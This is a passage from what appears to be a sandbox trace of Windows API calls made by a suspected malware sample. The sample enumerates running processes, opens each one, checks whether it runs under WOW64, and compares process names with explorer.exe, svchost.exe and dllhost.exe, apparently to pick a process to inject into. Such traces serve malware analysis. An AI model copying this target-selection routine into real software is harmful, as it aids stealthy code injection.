lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0228.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0228.012] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0228.012] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0228.013] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0228.013] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0228.014] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0228.015] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0228.015] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0228.016] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0228.016] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0228.017] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.017] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.017] CloseHandle (hObject=0xec) returned 1 [0228.017] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0228.018] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0228.018] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.018] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.018] CloseHandle (hObject=0xec) returned 1 [0228.018] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0228.019] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0228.019] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0228.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0228.020] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.020] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.020] CloseHandle (hObject=0xec) returned 1 [0228.020] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0228.020] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0228.020] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0228.020] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0228.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0228.021] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.021] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.021] CloseHandle (hObject=0xec) returned 1 [0228.021] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0228.021] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0228.021] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0228.021] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0228.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0228.021] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.021] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.021] CloseHandle (hObject=0xec) returned 1 [0228.021] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0228.021] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0228.021] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0228.022] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0228.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0228.022] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.022] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.022] CloseHandle (hObject=0xec) returned 1 [0228.022] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0228.022] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0228.022] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0228.022] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0228.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0228.023] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.023] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.023] CloseHandle (hObject=0xec) returned 1 [0228.023] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0228.023] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0228.023] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0228.023] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0228.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0228.023] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.023] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.023] CloseHandle (hObject=0xec) returned 1 [0228.023] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0228.024] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0228.024] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0228.024] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0228.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0228.024] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.024] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.024] CloseHandle (hObject=0xec) returned 1 [0228.024] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0228.024] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0228.024] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0228.024] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0228.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0228.025] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.025] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.025] CloseHandle (hObject=0xec) returned 1 [0228.025] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0228.025] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0228.025] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0228.025] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0228.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0228.025] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.025] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.026] CloseHandle (hObject=0xec) returned 1 [0228.026] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0228.026] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0228.026] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0228.026] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0228.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0228.026] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.026] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.026] CloseHandle (hObject=0xec) returned 1 [0228.026] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0228.026] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0228.026] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0228.026] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0228.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0228.027] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.027] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.027] CloseHandle (hObject=0xec) returned 1 [0228.027] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0228.027] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0228.027] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0228.027] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0228.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0228.028] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.028] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.028] CloseHandle (hObject=0xec) returned 1 [0228.028] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0228.028] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0228.028] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0228.028] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0228.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0228.028] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.028] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.028] CloseHandle (hObject=0xec) returned 1 [0228.028] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0228.028] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0228.028] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0228.028] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0228.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0228.029] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.029] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.029] CloseHandle (hObject=0xec) returned 1 [0228.029] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0228.029] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0228.029] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0228.029] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0228.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0228.030] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.030] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.030] CloseHandle (hObject=0xec) returned 1 [0228.030] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0228.030] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0228.030] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0228.030] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0228.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0228.030] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.030] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.030] CloseHandle (hObject=0xec) returned 1 [0228.030] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0228.030] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0228.030] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0228.030] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0228.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0228.031] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.031] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.031] CloseHandle (hObject=0xec) returned 1 [0228.031] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0228.031] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0228.031] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0228.031] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0228.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0228.032] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.032] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.032] CloseHandle (hObject=0xec) returned 1 [0228.032] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0228.032] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0228.032] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0228.032] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0228.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0228.032] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.032] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.032] CloseHandle (hObject=0xec) returned 1 [0228.032] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0228.032] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0228.032] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0228.033] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0228.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0228.033] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.033] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.033] CloseHandle (hObject=0xec) returned 1 [0228.033] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0228.033] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0228.033] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0228.033] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0228.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0228.034] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.034] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0228.034] CloseHandle (hObject=0xec) returned 1 [0228.034] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0228.034] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0228.034] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0228.034] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0228.034] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.035] OpenProcess (dwDesiredAccess=0x400, 